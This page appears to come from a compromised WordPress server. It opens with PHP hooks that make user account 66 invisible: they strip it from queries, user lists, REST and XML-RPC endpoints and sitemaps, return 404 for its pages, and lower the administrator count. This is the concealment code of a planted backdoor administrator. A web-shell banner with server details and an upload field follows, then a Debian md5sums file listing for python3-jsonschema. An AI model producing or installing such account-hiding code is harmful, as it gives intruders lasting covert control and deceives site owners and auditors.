add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
72f7d8ebce5531d0f838c70b9cb69fdd usr/bin/jsonschema c72246579c4437c07cebb86fbcbc6d90 usr/lib/python3/dist-packages/jsonschema-4.10.3.dist-info/INSTALLER eb118484765b4b9db7ed51019baf0976 usr/lib/python3/dist-packages/jsonschema-4.10.3.dist-info/METADATA c3c172be777b2014a95410712715e881 usr/lib/python3/dist-packages/jsonschema-4.10.3.dist-info/WHEEL 095614c840316fb033b6b246ebc5a437 usr/lib/python3/dist-packages/jsonschema-4.10.3.dist-info/entry_points.txt 19e55b6460fe6652a1615d8f3d2a8857 usr/lib/python3/dist-packages/jsonschema/__init__.py 50d77d3e94ae1e04bb0fadfb6d76802b usr/lib/python3/dist-packages/jsonschema/__main__.py 4e44f6eab0d5177596e1e003b6c63468 usr/lib/python3/dist-packages/jsonschema/_format.py 9b19e8a86e5ad462525b8e7bc44a7ddc usr/lib/python3/dist-packages/jsonschema/_legacy_validators.py c013bcaeeb3d51b1670d90932566dd3e usr/lib/python3/dist-packages/jsonschema/_types.py a6f02737edf4bacfffa6b06fb6a0fb6c usr/lib/python3/dist-packages/jsonschema/_utils.py 575a8fe9d25965698d705740425c8a8b usr/lib/python3/dist-packages/jsonschema/_validators.py f85a3896b1e2683f47269e8671f71eae usr/lib/python3/dist-packages/jsonschema/benchmarks/__init__.py 6afc3112e6cd76211ef19d8249d9c755 usr/lib/python3/dist-packages/jsonschema/benchmarks/issue232.py a50833e54aa514325530e96ac0ea499f usr/lib/python3/dist-packages/jsonschema/benchmarks/issue232/issue.json 2f7129cb92ced2f7a14683dabc6267b8 usr/lib/python3/dist-packages/jsonschema/benchmarks/json_schema_test_suite.py 0946a867287babaa709ec5ef5a5f1eba usr/lib/python3/dist-packages/jsonschema/cli.py 900279463c8fc2673525cc13178e7a85 usr/lib/python3/dist-packages/jsonschema/exceptions.py 97aac689a32fea98f199bc25d25d050d usr/lib/python3/dist-packages/jsonschema/protocols.py 235e1fd47201b751194d9e8e90969ce4 usr/lib/python3/dist-packages/jsonschema/schemas/draft2019-09.json e32920982620b2b43803dc82d4640b50 usr/lib/python3/dist-packages/jsonschema/schemas/draft2020-12.json d08523adb8fe75019001f6575c7bba94 usr/lib/python3/dist-packages/jsonschema/schemas/draft3.json 33a254b15c2847cbbebe88c9347a1621 usr/lib/python3/dist-packages/jsonschema/schemas/draft4.json f46ac1267d2110f8f9e22b419be0b421 usr/lib/python3/dist-packages/jsonschema/schemas/draft6.json bacf2806af4fea75ccd6abe8c8444722 usr/lib/python3/dist-packages/jsonschema/schemas/draft7.json 76a84117afa900d0973327fd7d720958 usr/lib/python3/dist-packages/jsonschema/schemas/vocabularies.json d41d8cd98f00b204e9800998ecf8427e usr/lib/python3/dist-packages/jsonschema/tests/__init__.py 73e62519d46db8eb465f6c17c63dd030 usr/lib/python3/dist-packages/jsonschema/tests/_helpers.py e6013fb86d1cf831dd7a8f991a714d3b usr/lib/python3/dist-packages/jsonschema/tests/_suite.py dd7635f4bd347a60d47c3b9c4b592fce usr/lib/python3/dist-packages/jsonschema/tests/fuzz_validate.py 2cd9d71010452af0b73fd30ecdeaa83c usr/lib/python3/dist-packages/jsonschema/tests/test_cli.py 4cf82b7c670dc28e65bb49e8188e37f0 usr/lib/python3/dist-packages/jsonschema/tests/test_deprecations.py f61ac9df65bc19c530b0d10c36e20537 usr/lib/python3/dist-packages/jsonschema/tests/test_exceptions.py e96061e05f02b877a3d3705a41be19f2 usr/lib/python3/dist-packages/jsonschema/tests/test_format.py 2b69924eb42009dc17224ef8a243c7b4 usr/lib/python3/dist-packages/jsonschema/tests/test_jsonschema_test_suite.py 44a1bd9e1b303e04085d300d7b62ebc5 usr/lib/python3/dist-packages/jsonschema/tests/test_types.py f99d08cc39b70b9a2e46727d61a1483f usr/lib/python3/dist-packages/jsonschema/tests/test_utils.py 9a74ef1e725b6fd2acd170ace6b86a01 usr/lib/python3/dist-packages/jsonschema/tests/test_validators.py 28d3952a94dcbfe1c73bbc1a5d6eed1a usr/lib/python3/dist-packages/jsonschema/validators.py ebc7f3f880b4c6c2260b6e22d950a42d usr/share/doc/python3-jsonschema/changelog.Debian.gz c027f2eb8f1bd9cf17c54ce3b13bed69 usr/share/doc/python3-jsonschema/copyright